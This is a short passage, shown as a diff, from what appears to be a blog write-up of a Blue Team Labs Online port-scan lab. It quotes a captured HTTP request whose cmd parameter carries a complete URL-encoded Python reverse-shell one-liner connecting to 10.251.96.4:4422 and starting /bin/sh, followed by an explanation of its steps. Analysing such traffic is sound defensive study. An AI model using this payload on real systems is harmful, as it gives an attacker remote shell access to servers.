ladybuginthemug/ladybuginthemug.github.io/content/writings/BTLOPortScan.md

 "16201","2021-02-07 16:42:35.675646891","10.251.96.4","10.251.96.5","HTTP","706","GET /uploads/dbfunctions.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.251.96.4%22,4422));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 HTTP/1.1 "
 ```

-The last request is trying to exploit a vulnerability in the server by injecting a Python one-liner that establishes a reverse shell connection to the specified IP and port in the following steps:
+The last request is trying to exploit a vulnerability in the server by injecting a TCP-based Python reverse shell with connection to the specified IP and port in the following steps:

 - Imports the socket, subprocess, and os modules.
 ```